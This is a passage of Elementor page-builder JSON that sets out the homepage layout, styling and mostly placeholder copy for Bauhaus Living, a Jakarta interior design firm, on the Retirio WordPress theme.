IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"015c584\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"200\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"180\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"animation\":\"fadeInUp\",\"animation_tablet\":\"none\",\"animation_delay\":200},\"elements\":[{\"id\":\"f11899a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"top\",\"align\":\"center\"},\"elements\":[{\"id\":\"b5b032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Trust the experts for all your <strong style=\\\"color: #242424;\\\">architects &amp; interior needs.<\\/strong><\\/p>\",\"text_color\":\"#9C9C9C\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"600\",\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"60\",\"bottom\":\"15\",\"left\":\"40\",\"isLinked\":false},\"_element_width\":\"auto\",\"_background_background\":\"classic\",\"_background_color\":\"#F5F5F5\",\"align_mobile\":\"center\",\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":false},\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6c98d6d\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Service\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"40\",\"bottom\":\"25\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/services\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":f